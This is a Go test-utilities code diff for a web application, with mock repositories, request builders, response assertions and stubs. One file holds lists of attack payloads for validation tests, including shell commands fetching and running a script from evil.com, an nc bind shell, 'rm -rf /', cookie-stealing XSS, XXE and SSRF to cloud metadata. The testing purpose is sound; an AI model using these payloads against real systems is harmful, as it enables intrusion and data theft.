count := int64(len(m.posts))
m.posts = make(map[uint]*database.Post)
return count, nil
}
func containsIgnoreCase(s, substr string) bool {
return len(s) >= len(substr)
}
type MockVoteRepository struct {
votes map[uint]*database.Vote
byUserPost map[string]*database.Vote
nextID uint
createErr error
updateErr error
deleteErr error
mu sync.RWMutex
DeleteErr error
}
func NewMockVoteRepository() *MockVoteRepository {
return &MockVoteRepository{
votes: make(map[uint]*database.Vote),
byUserPost: make(map[string]*database.Vote),
nextID: 1,
}
}
func (m *MockVoteRepository) Create(vote *database.Vote) error {
m.mu.Lock()
defer m.mu.Unlock()
if m.createErr != nil {
return m.createErr
}
var key string
if vote.UserID != nil {
key = m.key(*vote.UserID, vote.PostID)
} else {
key = fmt.Sprintf("anon-%d", vote.PostID)
}
if existingVote, exists := m.byUserPost[key]; exists {
existingVote.Type = vote.Type
existingVote.UpdatedAt = vote.UpdatedAt
vote.ID = existingVote.ID
return nil
}
vote.ID = m.nextID
m.nextID++
voteCopy := *vote
m.votes[vote.ID] = &voteCopy
m.byUserPost[key] = &voteCopy
return nil
}
func (m *MockVoteRepository) CreateOrUpdate(vote *database.Vote) error {
return m.Create(vote)
}
func (m *MockVoteRepository) GetByID(id uint) (*database.Vote, error) {
m.mu.RLock()
defer m.mu.RUnlock()
if vote, ok := m.votes[id]; ok {
voteCopy := *vote
return &voteCopy, nil
}
return nil, gorm.ErrRecordNotFound
}
func (m *MockVoteRepository) GetByUserAndPost(userID, postID uint) (*database.Vote, error) {
m.mu.RLock()
defer m.mu.RUnlock()
key := m.key(userID, postID)
if vote, ok := m.byUserPost[key]; ok {
voteCopy := *vote
return &voteCopy, nil
}
return nil, gorm.ErrRecordNotFound
}
func (m *MockVoteRepository) GetByVoteHash(voteHash string) (*database.Vote, error) {
m.mu.RLock()
defer m.mu.RUnlock()
for _, vote := range m.votes {
if vote.VoteHash != nil && *vote.VoteHash == voteHash {
voteCopy := *vote
return &voteCopy, nil
}
}
return nil, gorm.ErrRecordNotFound
}
func (m *MockVoteRepository) GetByPostID(postID uint) ([]database.Vote, error) {
m.mu.RLock()
defer m.mu.RUnlock()
var votes []database.Vote
for _, vote := range m.votes {
if vote.PostID == postID {
votes = append(votes, *vote)
}
}
return votes, nil
}
func (m *MockVoteRepository) GetByUserID(userID uint) ([]database.Vote, error) {
m.mu.RLock()
defer m.mu.RUnlock()
var votes []database.Vote
for _, vote := range m.votes {
if vote.UserID != nil && *vote.UserID == userID {
votes = append(votes, *vote)
}
}
return votes, nil
}
func (m *MockVoteRepository) Update(vote *database.Vote) error {
m.mu.Lock()
defer m.mu.Unlock()
if m.updateErr != nil {
return m.updateErr
}
if _, ok := m.votes[vote.ID]; !ok {
return gorm.ErrRecordNotFound
}
voteCopy := *vote
m.votes[vote.ID] = &voteCopy
var key string
if vote.UserID != nil {
key = m.key(*vote.UserID, vote.PostID)
} else {
key = fmt.Sprintf("anon-%d", vote.PostID)
}
m.byUserPost[key] = &voteCopy
return nil
}
func (m *MockVoteRepository) Delete(id uint) error {
m.mu.Lock()
defer m.mu.Unlock()
if m.DeleteErr != nil {
return m.DeleteErr
}
if vote, ok := m.votes[id]; ok {
delete(m.votes, id)
var key string
if vote.UserID != nil {
key = m.key(*vote.UserID, vote.PostID)
} else {
key = fmt.Sprintf("anon-%d", vote.PostID)
}
delete(m.byUserPost, key)
return nil
}
return gorm.ErrRecordNotFound
}
func (m *MockVoteRepository) CountByPostID(postID uint) (int64, error) {
m.mu.RLock()
defer m.mu.RUnlock()
count := int64(0)
for _, vote := range m.votes {
if vote.PostID == postID {
count++
}
}
return count, nil
}
func (m *MockVoteRepository) CountByUserID(userID uint) (int64, error) {
m.mu.RLock()
defer m.mu.RUnlock()
count := int64(0)
for _, vote := range m.votes {
if vote.UserID != nil && *vote.UserID == userID {
count++
}
}
return count, nil
}
func (m *MockVoteRepository) Count() (int64, error) {
m.mu.RLock()
defer m.mu.RUnlock()
return int64(len(m.votes)), nil
}
func (m *MockVoteRepository) WithTx(tx *gorm.DB) repositories.VoteRepository {
return m
}
func (m *MockVoteRepository) key(userID, postID uint) string {
return fmt.Sprintf("%d-%d", userID, postID)
}
func (m *MockVoteRepository) SetCreateError(err error) {
m.mu.Lock()
defer m.mu.Unlock()
m.createErr = err
}
func (m *MockVoteRepository) SetUpdateError(err error) {
m.mu.Lock()
defer m.mu.Unlock()
m.updateErr = err
}
func (m *MockVoteRepository) SetDeleteError(err error) {
m.mu.Lock()
defer m.mu.Unlock()
m.deleteErr = err
}

View File

@@ -0,0 +1,125 @@
package testutils
import (
"bytes"
"encoding/json"
"fmt"
"io"
"maps"
"net/http"
)
const (
StandardUserAgent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
StandardAcceptEncoding = "gzip"
)
type RequestBuilder struct {
method string
url string
body io.Reader
headers map[string]string
withAuth bool
authToken string
withJSON bool
jsonData any
withStdHeaders bool
withIP bool
ipAddress string
}
func NewRequestBuilder(method, url string) *RequestBuilder {
return &RequestBuilder{
method: method,
url: url,
headers: make(map[string]string),
withStdHeaders: true,
}
}
func (rb *RequestBuilder) WithBody(body io.Reader) *RequestBuilder {
rb.body = body
return rb
}
func (rb *RequestBuilder) WithJSONBody(data any) *RequestBuilder {
rb.withJSON = true
rb.jsonData = data
return rb
}
func (rb *RequestBuilder) WithHeader(key, value string) *RequestBuilder {
rb.headers[key] = value
return rb
}
func (rb *RequestBuilder) WithHeaders(headers map[string]string) *RequestBuilder {
maps.Copy(rb.headers, headers)
return rb
}
func (rb *RequestBuilder) WithAuth(token string) *RequestBuilder {
rb.withAuth = true
rb.authToken = token
return rb
}
func (rb *RequestBuilder) WithIP(ipAddress string) *RequestBuilder {
rb.withIP = true
rb.ipAddress = ipAddress
return rb
}
func (rb *RequestBuilder) WithoutStandardHeaders() *RequestBuilder {
rb.withStdHeaders = false
return rb
}
func (rb *RequestBuilder) Build() (*http.Request, error) {
var body io.Reader = rb.body
if rb.withJSON && rb.jsonData != nil {
jsonBytes, err := json.Marshal(rb.jsonData)
if err != nil {
return nil, fmt.Errorf("failed to marshal JSON body: %w", err)
}
body = bytes.NewReader(jsonBytes)
}
request, err := http.NewRequest(rb.method, rb.url, body)
if err != nil {
return nil, fmt.Errorf("failed to create request: %w", err)
}
if rb.withStdHeaders {
request.Header.Set("User-Agent", StandardUserAgent)
request.Header.Set("Accept-Encoding", StandardAcceptEncoding)
}
if rb.withJSON {
request.Header.Set("Content-Type", "application/json")
}
if rb.withAuth && rb.authToken != "" {
request.Header.Set("Authorization", "Bearer "+rb.authToken)
}
if rb.withIP && rb.ipAddress != "" {
request.Header.Set("X-Forwarded-For", rb.ipAddress)
}
for key, value := range rb.headers {
request.Header.Set(key, value)
}
return request, nil
}
func (rb *RequestBuilder) BuildOrFatal(t TestingT) *http.Request {
req, err := rb.Build()
if err != nil {
if h, ok := t.(interface{ Helper() }); ok {
h.Helper()
}
t.Fatalf("RequestBuilder.Build failed: %v", err)
}
return req
}
type TestingT interface {
Helper()
Errorf(format string, args ...any)
Fatalf(format string, args ...any)
}

View File

@@ -0,0 +1,194 @@
package testutils
import (
"compress/gzip"
"encoding/json"
"fmt"
"io"
"net/http"
"strings"
)
func AssertStatusCode(t TestingT, resp *http.Response, expected int) {
t.Helper()
if resp.StatusCode != expected {
var bodyPreview string
if resp.Body != nil {
bodyBytes := make([]byte, 512)
n, _ := resp.Body.Read(bodyBytes)
bodyPreview = string(bodyBytes[:n])
if seeker, ok := resp.Body.(io.Seeker); ok {
seeker.Seek(0, io.SeekStart)
}
}
t.Errorf("Expected status code %d, got %d. Response preview: %s", expected, resp.StatusCode, bodyPreview)
}
}
func AssertStatusCodeFatal(t TestingT, resp *http.Response, expected int) {
t.Helper()
if resp.StatusCode != expected {
var bodyPreview string
if resp.Body != nil {
bodyBytes := make([]byte, 512)
n, _ := resp.Body.Read(bodyBytes)
bodyPreview = string(bodyBytes[:n])
}
t.Fatalf("Expected status code %d, got %d. Response preview: %s", expected, resp.StatusCode, bodyPreview)
}
}
func AssertE2EJSONResponse(t TestingT, resp *http.Response) (*APIResponse, error) {
t.Helper()
var reader io.Reader = resp.Body
if resp.Header.Get("Content-Encoding") == "gzip" {
gzReader, err := gzip.NewReader(resp.Body)
if err != nil {
return nil, fmt.Errorf("failed to create gzip reader: %w", err)
}
defer gzReader.Close()
reader = gzReader
}
var apiResp APIResponse
if err := json.NewDecoder(reader).Decode(&apiResp); err != nil {
if resp.Body != nil {
bodyBytes := make([]byte, 1024)
n, _ := resp.Body.Read(bodyBytes)
return nil, fmt.Errorf("failed to decode JSON response: %w. Body preview: %s", err, string(bodyBytes[:n]))
}
return nil, fmt.Errorf("failed to decode JSON response: %w", err)
}
return &apiResp, nil
}
func AssertE2ESuccessResponse(t TestingT, resp *http.Response, expectedStatus int) {
t.Helper()
AssertStatusCode(t, resp, expectedStatus)
apiResp, err := AssertE2EJSONResponse(t, resp)
if err != nil {
t.Errorf("Failed to decode JSON response: %v", err)
return
}
if !apiResp.Success {
t.Errorf("Expected response to indicate success (success: true), got success: false. Message: %s", apiResp.Message)
if apiResp.Data != nil {
t.Errorf("Response data: %v", apiResp.Data)
}
}
}
func AssertE2ESuccessResponseFatal(t TestingT, resp *http.Response, expectedStatus int) {
t.Helper()
if resp.StatusCode != expectedStatus {
var bodyPreview string
if resp.Body != nil {
bodyBytes := make([]byte, 512)
n, _ := resp.Body.Read(bodyBytes)
bodyPreview = string(bodyBytes[:n])
}
t.Fatalf("Expected status code %d, got %d. Response preview: %s", expectedStatus, resp.StatusCode, bodyPreview)
}
apiResp, err := AssertE2EJSONResponse(t, resp)
if err != nil {
t.Fatalf("Failed to decode JSON response: %v", err)
}
if !apiResp.Success {
t.Fatalf("Expected response to indicate success (success: true), got success: false. Message: %s", apiResp.Message)
}
}
func AssertE2EErrorResponse(t TestingT, resp *http.Response, expectedStatus int, errorPattern string) {
t.Helper()
if resp.StatusCode < 400 {
t.Errorf("Expected error status code (4xx or 5xx), got %d", resp.StatusCode)
}
if expectedStatus > 0 && resp.StatusCode != expectedStatus {
t.Errorf("Expected error status code %d, got %d", expectedStatus, resp.StatusCode)
}
apiResp, err := AssertE2EJSONResponse(t, resp)
if err != nil {
return
}
if apiResp.Success {
t.Errorf("Expected error response (success: false), got success: true")
}
if errorPattern != "" {
var errorMsg string
if errorField, ok := getErrorField(apiResp); ok {
errorMsg = errorField
} else if apiResp.Message != "" {
errorMsg = apiResp.Message
}
if errorMsg == "" {
t.Errorf("Expected error message containing '%s', but no error message found in response", errorPattern)
} else if !strings.Contains(strings.ToLower(errorMsg), strings.ToLower(errorPattern)) {
t.Errorf("Expected error message to contain '%s', got: %s", errorPattern, errorMsg)
}
}
}
func AssertE2EErrorResponseFatal(t TestingT, resp *http.Response, expectedStatus int, errorPattern string) {
t.Helper()
if expectedStatus > 0 && resp.StatusCode != expectedStatus {
var bodyPreview string
if resp.Body != nil {
bodyBytes := make([]byte, 512)
n, _ := resp.Body.Read(bodyBytes)
bodyPreview = string(bodyBytes[:n])
}
t.Fatalf("Expected error status code %d, got %d. Response preview: %s", expectedStatus, resp.StatusCode, bodyPreview)
}
apiResp, err := AssertE2EJSONResponse(t, resp)
if err != nil {
return
}
if apiResp.Success {
t.Fatalf("Expected error response (success: false), got success: true")
}
if errorPattern != "" {
var errorMsg string
if errorField, ok := getErrorField(apiResp); ok {
errorMsg = errorField
} else if apiResp.Message != "" {
errorMsg = apiResp.Message
}
if errorMsg == "" {
t.Fatalf("Expected error message containing '%s', but no error message found in response", errorPattern)
} else if !strings.Contains(strings.ToLower(errorMsg), strings.ToLower(errorPattern)) {
t.Fatalf("Expected error message to contain '%s', got: %s", errorPattern, errorMsg)
}
}
}
func getErrorField(resp *APIResponse) (string, bool) {
if resp == nil {
return "", false
}
if dataMap, ok := resp.Data.(map[string]interface{}); ok {
if errorVal, ok := dataMap["error"].(string); ok {
return errorVal, true
}
}
if resp.Message != "" {
return resp.Message, true
}
return "", false
}
func ReadResponseBody(t TestingT, resp *http.Response) (string, error) {
t.Helper()
var reader io.Reader = resp.Body
if resp.Header.Get("Content-Encoding") == "gzip" {
gzReader, err := gzip.NewReader(resp.Body)
if err != nil {
return "", fmt.Errorf("failed to create gzip reader: %w", err)
}
defer gzReader.Close()
reader = gzReader
}
bodyBytes, err := io.ReadAll(reader)
if err != nil {
return "", fmt.Errorf("failed to read response body: %w", err)
}
return string(bodyBytes), nil
}

View File

@@ -0,0 +1,259 @@
package testutils
import (
"crypto/rand"
"crypto/sha256"
"encoding/hex"
"math/big"
"strings"
"testing"
)
type MaliciousInputs struct {
SQLInjection []string
XSSPayloads []string
PathTraversal []string
CommandInjection []string
LDAPInjection []string
NoSQLInjection []string
CSRFPayloads []string
XXE []string
SSRF []string
BufferOverflow []string
FormatString []string
Unicode []string
Encoding []string
}
func GetMaliciousInputs() *MaliciousInputs {
return &MaliciousInputs{
SQLInjection: []string{
"'; DROP TABLE users; --",
"' OR '1'='1",
"' UNION SELECT * FROM users --",
"'; INSERT INTO users VALUES ('hacker', 'hacker@evil.com', 'password'); --",
"' OR 1=1 --",
"admin'--",
"admin'/*",
"' OR 'x'='x",
"' AND id IS NULL; --",
"'; EXEC xp_cmdshell('dir'); --",
"' UNION SELECT password FROM users WHERE username='admin' --",
"1'; DELETE FROM users; --",
"' OR 'a'='a",
"'; UPDATE users SET password='hacked' WHERE username='admin'; --",
"' OR EXISTS(SELECT * FROM users WHERE username='admin') --",
},
XSSPayloads: []string{
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"<svg onload=alert('XSS')>",
"javascript:alert('XSS')",
"<iframe src=javascript:alert('XSS')></iframe>",
"<body onload=alert('XSS')>",
"<input onfocus=alert('XSS') autofocus>",
"<select onfocus=alert('XSS') autofocus>",
"<textarea onfocus=alert('XSS') autofocus>",
"<keygen onfocus=alert('XSS') autofocus>",
"<video><source onerror=alert('XSS')>",
"<audio src=x onerror=alert('XSS')>",
"<details open ontoggle=alert('XSS')>",
"<marquee onstart=alert('XSS')>",
"<math><mi//xlink:href=data:x,<script>alert('XSS')</script>",
},
PathTraversal: []string{
"../../../etc/passwd",
"..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
"....//....//....//etc/passwd",
"..%2F..%2F..%2Fetc%2Fpasswd",
"..%252F..%252F..%252Fetc%252Fpasswd",
"..%c0%af..%c0%af..%c0%afetc%c0%afpasswd",
"..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd",
"..%255c..%255c..%255cetc%255cpasswd",
"..%2e%2e%2f..%2e%2e%2f..%2e%2e%2fetc%2fpasswd",
"..%252e%252e%252f..%252e%252e%252f..%252e%252e%252fetc%252fpasswd",
},
CommandInjection: []string{
"; ls -la",
"| cat /etc/passwd",
"&& whoami",
"|| id",
"`whoami`",
"$(whoami)",
"; rm -rf /",
"| nc -l -p 4444 -e /bin/sh",
"&& wget http://evil.com/shell.sh -O /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh",
"|| curl http://evil.com/shell.sh | sh",
},
LDAPInjection: []string{
"*)(uid=*))(|(uid=*",
"*)(|(password=*))",
"*)(|(objectClass=*))",
"*)(|(mail=*))",
"*)(|(cn=*))",
"*)(|(sn=*))",
"*)(|(givenName=*))",
"*)(|(telephoneNumber=*))",
"*)(|(userPassword=*))",
"*)(|(description=*))",
},
NoSQLInjection: []string{
"{\"$where\": \"this.username == this.password\"}",
"{\"$ne\": null}",
"{\"$gt\": \"\"}",
"{\"$regex\": \".*\"}",
"{\"$exists\": true}",
"{\"$or\": [{\"username\": \"admin\"}, {\"password\": \"admin\"}]}",
"{\"$and\": [{\"username\": {\"$ne\": null}}, {\"password\": {\"$ne\": null}}]}",
"{\"username\": {\"$in\": [\"admin\", \"root\", \"administrator\"]}}",
"{\"$where\": \"function() { return this.username == this.password; }\"}",
"{\"$where\": \"this.username.match(/.*/)\"}",
},
CSRFPayloads: []string{
"<form action=\"http://target.com/transfer\" method=\"POST\"><input type=\"hidden\" name=\"amount\" value=\"1000\"><input type=\"hidden\" name=\"to\" value=\"attacker\"><input type=\"submit\" value=\"Click me\"></form>",
"<img src=\"http://target.com/transfer?amount=1000&to=attacker\">",
"<iframe src=\"http://target.com/transfer?amount=1000&to=attacker\"></iframe>",
"<script>fetch('http://target.com/transfer', {method: 'POST', body: 'amount=1000&to=attacker'})</script>",
"<link rel=\"stylesheet\" href=\"http://target.com/transfer?amount=1000&to=attacker\">",
},
XXE: []string{
"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>",
"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://evil.com/xxe\">]><foo>&xxe;</foo>",
"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///c:/windows/system32/drivers/etc/hosts\">]><foo>&xxe;</foo>",
"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"php://filter/read=convert.base64-encode/resource=index.php\">]><foo>&xxe;</foo>",
"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"data://text/plain;base64,PHBocCBwaHBpbmZvKCk7ID8+\">]><foo>&xxe;</foo>",
},
SSRF: []string{
"http://localhost:22",
"http://127.0.0.1:22",
"http://0.0.0.0:22",
"http://[::1]:22",
"http://169.254.169.254/",
"http://metadata.google.internal/",
"http://169.254.169.254/latest/meta-data/",
"http://169.254.169.254/latest/user-data/",
"http://169.254.169.254/latest/security-credentials/",
"file:///etc/passwd",
"file:///c:/windows/system32/drivers/etc/hosts",
"gopher://127.0.0.1:22",
"dict://127.0.0.1:22",
"ldap://127.0.0.1:389",
},
BufferOverflow: []string{
strings.Repeat("A", 1000),
strings.Repeat("B", 10000),
strings.Repeat("C", 100000),
strings.Repeat("D", 1000000),
strings.Repeat("E", 10000000),
},
FormatString: []string{
"%x%x%x%x%x%x%x%x%x%x",
"%p%p%p%p%p%p%p%p%p%p",
"%s%s%s%s%s%s%s%s%s%s",
"%n%n%n%n%n%n%n%n%n%n",
"%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x",
"%08p%08p%08p%08p%08p%08p%08p%08p%08p%08p",
},
Unicode: []string{
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
},
Encoding: []string{
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
"<script>alert('XSS')</script>",
},
}
}
func GenerateSecureRandomString(length int) (string, error) {
const charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
b := make([]byte, length)
for i := range b {
num, err := rand.Int(rand.Reader, big.NewInt(int64(len(charset))))
if err != nil {
return "", err
}
b[i] = charset[num.Int64()]
}
return string(b), nil
}
func GenerateSecurePassword(length int) (string, error) {
const charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+-=[]{}|;:,.<>?"
b := make([]byte, length)
for i := range b {
num, err := rand.Int(rand.Reader, big.NewInt(int64(len(charset))))
if err != nil {
return "", err
}
b[i] = charset[num.Int64()]
}
return string(b), nil
}
func HashVerificationToken(token string) string {
sum := sha256.Sum256([]byte(token))
return hex.EncodeToString(sum[:])
}
func AssertNoSQLInjection(t *testing.T, field string, value string, expectedError bool) {
t.Helper()
if strings.Contains(strings.ToLower(value), "drop table") {
if !expectedError {
t.Errorf("Expected SQL injection to be detected for field %s with value %s", field, value)
}
} else if expectedError {
t.Errorf("Expected SQL injection error for field %s with value %s", field, value)
}
}
func AssertNoXSS(t *testing.T, field string, value string, expectedError bool) {
t.Helper()
if strings.Contains(value, "<script>") {
if !expectedError {
t.Errorf("Expected XSS to be detected for field %s with value %s", field, value)
}
} else if expectedError {
t.Errorf("Expected XSS error for field %s with value %s", field, value)
}
}
func AssertNoPathTraversal(t *testing.T, field string, value string, expectedError bool) {
t.Helper()
if strings.Contains(value, "../") || strings.Contains(value, "..\\") {
if !expectedError {
t.Errorf("Expected path traversal to be detected for field %s with value %s", field, value)
}
} else if expectedError {
t.Errorf("Expected path traversal error for field %s with value %s", field, value)
}
}
func AssertValidationError(t *testing.T, field string, value string, expectedError bool, err error) {
t.Helper()
if expectedError && err == nil {
t.Errorf("Expected validation error for %s field with value %s", field, value)
} else if !expectedError && err != nil {
t.Errorf("Unexpected validation error for %s field: %v", field, err)
}
}

View File

@@ -0,0 +1,42 @@
package testutils
var SQLInjectionPayloads = []string{
"'; DROP TABLE users; --",
"' OR '1'='1",
"' UNION SELECT * FROM users--",
"1' OR '1'='1",
"' OR 1=1--",
"' OR 1=1#",
"' OR '1'='1'--",
"admin'--",
"admin'/*",
"' OR 1=1 LIMIT 1 --'",
"') OR ('1'='1",
"' OR 'x'='x",
"' AND 1=1--",
"' AND 1=2--",
"1' AND '1'='1",
}
var XSSPayloads = []string{
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"<svg onload=alert('XSS')>",
"javascript:alert('XSS')",
"<iframe src=javascript:alert('XSS')>",
"<body onload=alert('XSS')>",
"<input onfocus=alert('XSS') autofocus>",
"<select onfocus=alert('XSS') autofocus>",
"<textarea onfocus=alert('XSS') autofocus>",
"'><script>alert('XSS')</script>",
"\"><script>alert('XSS')</script>",
"<script>document.location='http://evil.com/?cookie='+document.cookie</script>",
"<img src=x onerror='eval(String.fromCharCode(97,108,101,114,116,40,49,41))'>",
"<svg><script>alert('XSS')</script></svg>",
"<iframe srcdoc='<script>alert(\"XSS\")</script>'>",
"<link rel=stylesheet href=javascript:alert('XSS')>",
"<meta http-equiv='refresh' content='0;url=javascript:alert(\"XSS\")'>",
"<style>@import'javascript:alert(\"XSS\")';</style>",
"<base href='javascript:alert(\"XSS\")//'>",
"<form><button formaction='javascript:alert(\"XSS\")'>click",
}

View File

@@ -0,0 +1,104 @@
package testutils
import (
"fmt"
"time"
)
type AsyncEmailSender interface {
Send(to, subject, body string) error
SendAsync(to, subject, body string) <-chan error
SetTimeout(timeout time.Duration)
}
type TestSMTPClient struct {
sender AsyncEmailSender
server *TestEmailServer
}
func NewTestSMTPClient(factory func(port int) AsyncEmailSender) (*TestSMTPClient, error) {
server, err := NewTestEmailServer()
if err != nil {
return nil, err
}
time.Sleep(100 * time.Millisecond)
sender := factory(server.GetPort())
if sender == nil {
server.Close()
return nil, fmt.Errorf("smtp sender factory returned nil")
}
return &TestSMTPClient{
sender: sender,
server: server,
}, nil
}
func (c *TestSMTPClient) Sender() AsyncEmailSender {
return c.sender
}
func (c *TestSMTPClient) Server() *TestEmailServer {
return c.server
}
func (c *TestSMTPClient) Close() error {
if c == nil || c.server == nil {
return nil
}
return c.server.Close()
}
func (c *TestSMTPClient) SendTestEmail(to, subject, body string) error {
if c == nil || c.sender == nil {
return fmt.Errorf("smtp sender not configured")
}
return c.sender.Send(to, subject, body)
}
func (c *TestSMTPClient) SendTestEmailAsync(to, subject, body string) <-chan error {
if c == nil || c.sender == nil {
result := make(chan error, 1)
result <- fmt.Errorf("smtp sender not configured")
close(result)
return result
}
return c.sender.SendAsync(to, subject, body)
}
func (c *TestSMTPClient) WaitForEmail(timeout time.Duration) bool {
if c == nil || c.server == nil {
return false
}
return c.server.WaitForEmails(1, timeout)
}
func (c *TestSMTPClient) GetReceivedEmails() []TestEmail {
if c == nil || c.server == nil {
return nil
}
return c.server.GetEmails()
}
func (c *TestSMTPClient) ClearReceivedEmails() {
if c == nil || c.server == nil {
return
}
c.server.ClearEmails()
}
func (c *TestSMTPClient) SetTimeout(timeout time.Duration) {
if c == nil || c.sender == nil {
return
}
c.sender.SetTimeout(timeout)
}

325
internal/testutils/stubs.go Normal file
View File

@@ -0,0 +1,325 @@
package testutils
import (
"context"
"gorm.io/gorm"
"goyco/internal/database"
"goyco/internal/repositories"
)
type PostRepositoryStub struct {
CreateFn func(*database.Post) error
GetByIDFn func(uint) (*database.Post, error)
GetAllFn func(int, int) ([]database.Post, error)
GetByUserIDFn func(uint, int, int) ([]database.Post, error)
UpdateFn func(*database.Post) error
DeleteFn func(uint) error
CountFn func() (int64, error)
CountByUserIDFn func(uint) (int64, error)
GetTopPostsFn func(int) ([]database.Post, error)
GetNewestPostsFn func(int) ([]database.Post, error)
SearchFn func(string, int, int) ([]database.Post, error)
GetPostsByDeletedUsersFn func() ([]database.Post, error)
HardDeletePostsByDeletedUsersFn func() (int64, error)
HardDeleteAllFn func() (int64, error)
WithTxFn func(*gorm.DB) repositories.PostRepository
}
func NewPostRepositoryStub() *PostRepositoryStub {
return &PostRepositoryStub{}
}
func (s *PostRepositoryStub) Create(post *database.Post) error {
if s != nil && s.CreateFn != nil {
return s.CreateFn(post)
}
return nil
}
func (s *PostRepositoryStub) GetByID(id uint) (*database.Post, error) {
if s != nil && s.GetByIDFn != nil {
return s.GetByIDFn(id)
}
return nil, gorm.ErrRecordNotFound
}
func (s *PostRepositoryStub) GetAll(limit, offset int) ([]database.Post, error) {
if s != nil && s.GetAllFn != nil {
return s.GetAllFn(limit, offset)
}
return nil, nil
}
func (s *PostRepositoryStub) GetByUserID(userID uint, limit, offset int) ([]database.Post, error) {
if s != nil && s.GetByUserIDFn != nil {
return s.GetByUserIDFn(userID, limit, offset)
}
return nil, nil
}
func (s *PostRepositoryStub) Update(post *database.Post) error {
if s != nil && s.UpdateFn != nil {
return s.UpdateFn(post)
}
return nil
}
func (s *PostRepositoryStub) Delete(id uint) error {
if s != nil && s.DeleteFn != nil {
return s.DeleteFn(id)
}
return nil
}
func (s *PostRepositoryStub) Count() (int64, error) {
if s != nil && s.CountFn != nil {
return s.CountFn()
}
return 0, nil
}
func (s *PostRepositoryStub) CountByUserID(userID uint) (int64, error) {
if s != nil && s.CountByUserIDFn != nil {
return s.CountByUserIDFn(userID)
}
return 0, nil
}
func (s *PostRepositoryStub) GetTopPosts(limit int) ([]database.Post, error) {
if s != nil && s.GetTopPostsFn != nil {
return s.GetTopPostsFn(limit)
}
return s.GetAll(limit, 0)
}
func (s *PostRepositoryStub) GetNewestPosts(limit int) ([]database.Post, error) {
if s != nil && s.GetNewestPostsFn != nil {
return s.GetNewestPostsFn(limit)
}
return s.GetAll(limit, 0)
}
func (s *PostRepositoryStub) Search(query string, limit, offset int) ([]database.Post, error) {
if s != nil && s.SearchFn != nil {
return s.SearchFn(query, limit, offset)
}
return nil, nil
}
func (s *PostRepositoryStub) GetPostsByDeletedUsers() ([]database.Post, error) {
if s != nil && s.GetPostsByDeletedUsersFn != nil {
return s.GetPostsByDeletedUsersFn()
}
return nil, nil
}
func (s *PostRepositoryStub) HardDeletePostsByDeletedUsers() (int64, error) {
if s != nil && s.HardDeletePostsByDeletedUsersFn != nil {
return s.HardDeletePostsByDeletedUsersFn()
}
return 0, nil
}
func (s *PostRepositoryStub) HardDeleteAll() (int64, error) {
if s != nil && s.HardDeleteAllFn != nil {
return s.HardDeleteAllFn()
}
return 0, nil
}
func (s *PostRepositoryStub) WithTx(tx *gorm.DB) repositories.PostRepository {
if s != nil && s.WithTxFn != nil {
return s.WithTxFn(tx)
}
return s
}
type UserRepositoryStub struct {
CreateFn func(*database.User) error
GetByIDFn func(uint) (*database.User, error)
GetByIDIncludingDeletedFn func(uint) (*database.User, error)
GetByUsernameFn func(string) (*database.User, error)
GetByUsernameIncludingFn func(string) (*database.User, error)
GetByEmailFn func(string) (*database.User, error)
GetByVerificationFn func(string) (*database.User, error)
GetByPasswordResetFn func(string) (*database.User, error)
GetAllFn func(int, int) ([]database.User, error)
UpdateFn func(*database.User) error
DeleteFn func(uint) error
HardDeleteFn func(uint) error
SoftDeleteWithPostsFn func(uint) error
LockFn func(uint) error
UnlockFn func(uint) error
GetPostsFn func(uint, int, int) ([]database.Post, error)
GetDeletedUsersFn func() ([]database.User, error)
HardDeleteAllFn func() (int64, error)
CountFn func() (int64, error)
WithTxFn func(*gorm.DB) repositories.UserRepository
}
func NewUserRepositoryStub() *UserRepositoryStub {
return &UserRepositoryStub{}
}
func (s *UserRepositoryStub) Create(user *database.User) error {
if s != nil && s.CreateFn != nil {
return s.CreateFn(user)
}
return nil
}
func (s *UserRepositoryStub) GetByID(id uint) (*database.User, error) {
if s != nil && s.GetByIDFn != nil {
return s.GetByIDFn(id)
}
return nil, gorm.ErrRecordNotFound
}
func (s *UserRepositoryStub) GetByIDIncludingDeleted(id uint) (*database.User, error) {
if s != nil && s.GetByIDIncludingDeletedFn != nil {
return s.GetByIDIncludingDeletedFn(id)
}
return s.GetByID(id)
}
func (s *UserRepositoryStub) GetByUsername(username string) (*database.User, error) {
if s != nil && s.GetByUsernameFn != nil {
return s.GetByUsernameFn(username)
}
return nil, gorm.ErrRecordNotFound
}
func (s *UserRepositoryStub) GetByUsernameIncludingDeleted(username string) (*database.User, error) {
if s != nil && s.GetByUsernameIncludingFn != nil {
return s.GetByUsernameIncludingFn(username)
}
return s.GetByUsername(username)
}
func (s *UserRepositoryStub) GetByEmail(email string) (*database.User, error) {
if s != nil && s.GetByEmailFn != nil {
return s.GetByEmailFn(email)
}
return nil, gorm.ErrRecordNotFound
}
